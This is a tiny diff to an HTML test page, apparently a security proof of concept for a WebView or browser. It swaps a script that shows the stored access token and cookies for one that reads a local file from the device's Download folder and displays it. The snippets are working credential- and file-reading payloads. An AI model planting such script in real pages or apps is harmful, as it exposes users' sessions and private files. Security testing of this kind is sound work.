--- a/1.html
+++ b/1.html
@@ -1,4 +1,5 @@
 <script>
-  alert("accessToken: " + localStorage.getItem("access_token"));
-  alert("session: " + document.cookie);
+   fetch("file:///sdcard/Download/secret.txt")
+    .then(r => r.text())
+    .then(alert)
 </script>
